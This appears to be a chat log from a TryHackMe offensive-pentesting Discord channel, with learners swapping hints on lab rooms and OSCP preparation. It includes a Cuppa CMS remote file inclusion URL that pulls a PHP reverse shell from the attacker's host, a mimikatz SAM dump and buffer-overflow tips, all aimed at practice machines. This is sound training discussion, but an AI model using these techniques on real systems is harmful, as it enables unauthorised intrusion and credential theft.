hey guys, I'm stuck at https://tryhackme.com/room/skynet , task# 3-4 , I finally managed to understand so I grab a || php reverse shell || and I'm sending this || shell.php || file through the exploit || Cuppa CMS RFI || The problem is, as soon as I send || http://10.10.136.154//45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://tunn0IP:8080/shell.php? || my nc gets a connection and then closes it right away, why ?
oh hang on, I think I understand why ..
Alright, there was a misconfiguration line in my || shell.php|| file ... now it works
@frigid star got the same problem. Sysinfo could be helpful
@hexed cloak yeah aha i got it now, didn't really understand the question at the time but got it now :D
@graceful nexus released? did you mean you submitted it?
because it's not public yet
I submitted it and its waiting review
But meanwhile you can deploy it as invite only
So you can already work on it, I hope soon it will be published
It's an epic machine
In which case, what's the point in the review process?..
Well I want it to be public not private
Should be accessible for all
Not just the ones who get invited
^^
The job of the review process is to determine whether a prospective room is suitable to be released publicly. That is for us (and ultimately the platform owners) to determine, not the creator.
Releasing the private link as a workaround kinda makes a mockery of that, no?
If it's considered a mockery shouldn't the share function be disabled then until the machine is approved?
No offense but it's literally called 'share'
That's there primarily because the site is also used by teachers who don't want their material to be publicly available. It's also used for the testers to join, or for you to share it with any friends who you want to try it.
It's not really there as a "Hey everyone, my room hasn't been tested yet, but ignore that and join anyway!"
Kind of a matter of context 🙂
Yea I'm just Sharing the link temporary for people to try
Not as a replacement for publication
😋
And if, heaven forbid, it doesn't pass review?
Then I will do my best to adjust it according to the reviewers' feedback until it does
(And until that point we're left with a link, posted in the public discord, to a room that shouldn't yet be publicly released, no?)
Not sure about the ToS, but it's definitely not really appropriate for the discord. Thank you though 🙂
We will get it reviewed soon -- I think Dan is on it 😄
Oki ^^
@chrome valve once its reviewed u should give it a try, i think you'll love it
Well it's official now, Just received my email saying I passed OSCP
😮 PogChamp @final vault. Nice one dude!
I rolled the OSCP path without looking what other paths exist. Can I read about the other paths somehow? I only seem to be able to view info about OSCP once I've enrolled in it.
you can leave and re-enroll in paths whenever you want
@sleek glade On the sidebar, do you see "Learning Paths"? Click it and at the top corner it says "Leave path"
@vague torrent Ok i'll try to leave it temporarily then. Thanks. I hope my progress does not get lost or something. I just registered 2 hours ago so new to the site.
@vague torrent it worked just fine to enter / leave paths 🙂
@final vault congrats.. how was the exam bro? how was it compared to THM OSCP PATH?
Hello everyone ! I'm having trouble in the bof1 (buffer overflows) box (in order to complete brainstorm after), I understood the first example with integer buffer overflow but I'm really having a bad time trying to overwrite the function pointer, anyone for a tip ? ^^'
task 7?
@litchi.pi#9313 I skipped bof1 since it's x64 and brainstorm is x86.
I see, perhaps another one can help you.
Well I wanna learn buffer overflows, no matter if x86 or x64
@litchi.pi#9313
isn't bof1 the absolute beginner buffer overflows box ?
@ember jay When I overflow the buffer, I can't write to the pointer properly, I tried "\x00" type binary of the function address I got after modifying the code, tried alphabetical representation, but at best it doesn't change the pointer at all, sometimes it just goes into a far address, worst case it gets 12 bytes long instead of 6
I struggle to find the relation between what happened and what I do x')
do you know pwntools?
for python?
not really needed actually
hold on im booting it up
do you use radare?
you might want to do radare room first
you'll need to debug the program
to find out where you can overwrite the pointer
radare2 and reverse engineering rooms are good starters
well I got the address 0x400557 of the special function, I just don't know how to overwrite it properly
how did you get that address?
Just printf("%p") the pointer
Ok understood
the "\x05" doesn't pass in stdin as binary
it does as characters "\" then "x" then "0", then "5"
\x05 is a hex char
Yep but I thought with stdin with the gets function it would translate the \x thing into a binary interpretation of the following 2 digits as if they were hex formatted
so I managed to get it work with echo -e
just managing little bugs now ^-^ Hope it'll be fine
My god just did it
Thank you anyway ! 😄
Hello everyone. I am on the Kenobi box, I cannot get smbget to work. I know I am supposed to download a file, but I get "Can't open log.txt: File exists" and then, "Failed to download /log.txt: File exists". Does anyone know how to solve it? TIA!
Hello. I'm in the Brainstorm box and I'm stuck, I can't run the chatserver.exe, I installed a Windows 7 virtual machine and ran the program but it only spawns a little window and shuts down immediately, do I need to install something else in the windows machine?
@hazy fog I can't remember if this Brainpan or Brainstorm but if you got your file from an FTP server, make sure to grab both files...
Yes I have both, the .dll file and still won't run
Now It works, I don't know if it was meant to be like this, but I learned something new
I just set transfer type to binary
binary name.exe
and then get
get name.exe
waaaw useful room
How many ports does the flag -p-400 scan
I wrote all the ports because -p- does that and the 400 will be ignored
but I get wrong answer
someone knows why?
scan all ports
but I asked about -p- 🙂
You asked about -p-400
If you wanted -p- then you already have your answer
Easiest thing here is probably just to try it and see what the output is 🤷♂️
An inquisitive mind goes a long way in this field
....
Hello,
Can anybody tell me when should one go for a certification like oscp.
I am fairly new in cybersecurity.
I have done a few easy rooms in tryhackme and few easy challenges and boxes in hackthebox.
OSCP is not for beginners at all. it's for high intermediate/advanced levels
as a beginner, don't worry about certs too much now
but eJPT would be a safe bet if you really need one
^
@bronze zenith Thank you.
Hello guys
I am doing the Vulnversity
I opened burp
I intercepted the request and sent it to intruder, in the payload I uploaded the txt file that contains all the extensions that are shown in the example to the payload "Payload Options simple list"
and in positions I chose sniper
and I took all the dollar signs and put them only on the file extension file$.png$
and I started the attack
but I got status 200 on all of them
and even when I checked the response for .phtml it shows me "Extension not allowed "
why?
@vital acorn Check your requests, do you notice anything strange in your filename?
yes, it is url encoding the .
try moving the . outside the $ (and change your list)
better yet, at the bottom the payloads tab, uncheck the Payload Encoding option
either should work
Has anyone done the THM new windows privesc room?
The one TCM made? Yep.
Good for OSCP ?
If you are a winprivesc noob, yes definitely
privesc is what kicked my ass when I took OSCP the most
it's really well done
Do you have OSCP @kind panther?
Ah 😅
I probably learned more in 90 days of lab than I did in a 4 year degree though
Good to know
I am taking OSCP in two weeks. I have finished the THM OSCP path. Are there anymore THM boxes that would help with OSCP?
I just joined THM so I wouldn't know 😕
How have you done in the OSCP boxes?
I know maybe 2 or 3 genius people on discord that passed OSCP without breaking around 20 boxes. And they are generally long time pentesters professionally
Hey, can someone tell me what the OSCP path is like? Is it worth? Go into detail please, I’m on the edge of buying pro
It's a good path. Good mixture of self study and pointed directions to help you understand where you should be headed.
The path here is good if you have or will have access to the PWK materials as a lot of the rooms contain topics that they teach you in the course. So you can read the course, do the room and then the labs as well, it's good additional practice on the topic(s) you need
The THM labs are significantly more stable than the overpriced labs in PWK. And you aren't left feeling completely lost and unguided here like you are there.
tRy hArDeR sometimes just doesn't cut it
@cloud flicker
Aren't the rooms the same thing as labs?
no, my understanding is the labs are all connected and you can pivot among certain network of labs (correct me if i'm wrong)
Yeah the PWK labs are like a simulated network
And things from one lab machine might be useful for another down the line, etc etc
guys, is this course good or not
Is this really an #offensive-pentesting-path related question?
Anyways, I wouldn't buy it. Anyone peddling dual booting Kali with a USB has completely lost my attention.
Here's a firehose list but it does have a mix of material and tools https://github.com/rshipp/awesome-malware-analysis
Not sure why that's being asked here though, you’re not going to be doing anything like that in OSCP
Curious, has anyone completed Alfred recently? I have a System shell and not seeing root.txt in the expected location of C:\Windows\System32\config... #offensive-pentesting-path
I have reset the box twice, and it is not showing up.
you need to migrate to a process that has permission to view the file
Ohhhh ok, sweet. Thank you. I thought because I was "nt authority\system" that I would be able to see it.
Oh geez, it says it right there in the #4 question of privesc. I blame lack of sleep! lol
why i can't see oscp-path on the site?
its changed to Offensive Pentesting i think
ah
For future reference, is this the best place to ask questions about specific rooms in the OSCP (Offensive Pentesting) Path....?
Hi, I've a question about Buffer Overflow Room Task 8, it's broken?
I've tried everything and can't get the shell...
I'm having the same problem, I managed to get a similar exploit working on a different room but this one isn't working at all. tried everything I can think of 😦
hey, can you use google at oscp?
Yes, you're allowed to use google
has anyone done GameZone without sqlmap and metasploit?
You could probably figure out the SQLi for it, but that would be tedious and take forever to trial and error.
You might be able to guess the parameters I guess.
Here's an article on how you can achieve it.
Can someone confirm if the "Offensive Pentesting" path is the same as the OSCP path? I see the same image but seems like the description and title changed
@slim summit It is the same yes, just with a new name/description
@spark iron Awesome! Thanks!
We changed the path because it's applicable to a lot of different scenarios
and the aim is that people use it to prep for various different security related things :))
Thank goodness for that. OSCP shouldn't be considered the only way into the field. 🙂
Plus I can imagine OffSec probably end up getting funny with y'all about it
Being as they have to rely on everyone else to prepare people for their exams, I'm sure they don't mind.
Alfred was the first room I wasn't able to complete without Metasploit, due to needing to migrate to a process to access a file. Does anyone have any resources on how you can do this without Metasploit?
The only thing I was able to find was https://resources.infosecinstitute.com/poor-mans-process-migration-windows
If you want to continue doing manually https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter/92893#92893
Thank you...I read that, but wasn't sure how to do the API calls...I will roll up my sleeves and dig in to figure that out.
It's probably like everything else, it is intimidating until you actually do it and find out it isn't so bad. lol
Yeah, wish I could help more but haven't tried doing this manually myself
No worries at all, just appreciate you reminding me of that.
@terse perch you can actually do it without metasploit.
I was able to do it yesterday, but it's gonna take some creativity.
You can do it without token manipulation as well.
Are you going to do a video on it by any chance? @rancid vine
i am not sure
I'll check
👍
I haven't done Alfred in that manner. But I could.
I can give you the low and dirty here if you want.
I literally spent hours trying to do it and only found one way that worked.
I was able to do everything without Metasploit, using Juicy Potato
I just couldn't figure out the process migration part
Oh ok. I didn't go that route.
I was able to use mimikatz in a reverse shell to impersonate, but couldn't get anywhere with it. In the end I:
||lsadump::sam and Rdesktop'd in.||
Or xfreerdp'd in
Oh interesting....and you were able to go in with the process in question's privileges?
Can bypass UAC by running as administrator in the GUI
Ohhhhhh yes, ok that makes sense
I am going to go back through some of the OSCP materials around bypassing UAC and see if that allows a bypass in this instance from the cmd line
I doubt they intended someone like me to go to that length.
It does not from what I remember.
I tried that.
haha but that is what it's about lol